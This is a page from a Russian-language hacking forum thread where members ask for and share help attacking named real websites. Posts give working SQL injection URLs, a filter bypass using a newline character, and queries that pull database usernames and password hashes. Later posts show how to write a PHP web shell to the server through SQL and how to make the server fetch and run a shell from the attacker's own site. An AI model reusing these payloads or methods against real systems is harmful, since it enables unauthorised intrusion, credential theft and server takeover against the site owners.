Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    ZARO, спасибо. А можете объяснить, почему вывод осуществляется только при соединении строк?
     
    #14521 a1ertso, 17 Aug 2010
    Last edited: 17 Aug 2010
  2. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Почему? Не обязательно соединять строки - http://www.music-master.ru/?action=show_list&cat=-11069+'+union+select+'vot%20vivod'+--+

    Ты просто забыл отсечь вывод с первого запроса, достаточно было поставить минус перед cat=
     
    #14522 ZARO, 17 Aug 2010
    Last edited: 17 Aug 2010
  3. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    ZARO, еще раз спасибо =)

    И снова проблема
    Запрос небезопасен и был отвергнут.
    Как это обойти?
     
  4. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54

    Можно так выводить :

    Code:
    http://www.music-master.ru/?action=show_list&cat=11069+'+and(select+1+from(select+count(*),concat(concat_ws(0x3a,column_name),floor(rand(0)*2))x+from+information_Schema.columns+group+by+x)a)+--+
     
  5. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Можно, конечно, и так, но обойти - это же гораздо интереснее :)

    1) Методом научного тыка определяем, что блочится последовательность
    Code:
    ...union...select...from...
    2) Из блока последовательности следует, что все три слова должны находиться в одной строке)
    3) Пытаемся сделать так, чтобы одна строка стала двумя, вводя энтер (%0A )
    Code:
    http://www.music-master.ru/?action=show_list&cat=-1'+union %0A select+table_name from information_schema.tables/*
    И все работает ^_^
     
    5 people like this.
  6. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    есть LFI
    _http://www.alma-nah.com/soiskatelinew.php?a=[LFI]
    нуллбайт не отсекает .html , есть ли альтернатива?

    ПС
    Подкиньте хорошей манны.
     
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    https://forum.antichat.ru/thread98525.html
     
    1 person likes this.
  8. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    ругается на тип и фильтрует кавычки

    http://ethnography.omskreg.ru/page.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10--+
    Можно что-нибудь сделать в данном случае?
    подскажите плз
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://ethnography.omskreg.ru/page.php?id=-1+Union+select+version()::int,null,null,null,null,null,null,null,null,null--+

    http://ethnography.omskreg.ru/page.php?id=-1+Union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+from+pg_shadow--+
     
    _________________________
    #14529 Konqi, 17 Aug 2010
    Last edited: 17 Aug 2010
  10. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    http://ethnography.omskreg.ru//inc/db.inc
    ;)
     
    2 people like this.
  11. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Заливаю шелл через sql и пишу +union+select+'<? system($_REQUEST[cmd]); ?>'+from+mysql.user+into+outfile+тут путь
    Фаил успешно заливается но при заходе на него пшет: Cannot execute a blank command in и путь
    То есть при 232.php?cmd=phpinfo() просто выводиться пустая страница.
    Что не так делаю?)
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    бро, system() это системная обалочка, если хочешь исполнять php код, надо через eval

    <?php eval($_REQUEST[cmd]) ?>
     
    _________________________
    #14532 Konqi, 18 Aug 2010
    Last edited: 18 Aug 2010
  13. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo() выводит Parse error: syntax error, unexpected $end in и и дальше путь
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    попробуй захексить код

    union+select+0x3c3f706870206576616c28245f4745545b5c27636d645c275d29203f3e+into+outfile
     
    _________________________
    1 person likes this.
  15. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Сервер: Linux 2.6.26-2
    При попытке бэк-конекта, командная строка просто висит пока не нажму отмена:
    [​IMG]
    У меня Win 2000
    Может фаервол сервера блокирует? Пробовал порт 80, тоже самое. В чем может быть проблема и есть ли решение?
     
  16. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Если ты можешь писать значит можешь и читать. сделай LOAD_FILE и посмотри что у тебя туда падает. Для начала попробуй '<? phpinfo(); ?>'
     
  17. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Сервак Windows NT при заливке шела через sql пишу <? php eval($_REQUEST[cmd]); ?>
    Дальше при cmd=dir выводит директории
    Вопрос как залить шел в Winows NT через cmd?
     
  18. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version())--



    почему вот тут кидает на главную, что можно сделать?
    http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,SCHEMA_NAME)+from+information_schema.SCHEMATA+--+
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    мен ты мне другое говорил )) если eval то

    cmd=copy($_GET,$_GET[d]);&s=http://твойсайт/shell.txt&d=/директория/shell.php;
    потом локальный инклуд(если директория не видно из веб)

    при allow_url_include=On

    cmd=include("http://твойсайт/shell.txt");
     
    _________________________
    1 person likes this.
  20. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Добавлю еще один способ.

    Требования: allow_url_fopen = on
    cmd=eval(file_get_contents('http://site.ru/shell.txt'));
    Удалить php дескрипторы в начале и конце шелла.

    Преимущества: не нужно знать папку на запись.
    Недостатки: больше следит в логах
     
    1 person likes this.
Thread Status:
Not open for further replies.